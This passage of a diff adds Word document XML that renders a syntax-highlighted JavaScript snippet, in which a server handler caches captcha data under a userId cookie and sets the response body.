+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="6A9955"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>// data[0];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>setCache</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>ctx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>cookies</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>get</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'userId'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>),</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="B5CEA8"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>ctx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>body</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="B5CEA8"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>setCache</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>function</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>uid</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>uid</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>cache</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>uid</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">] = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
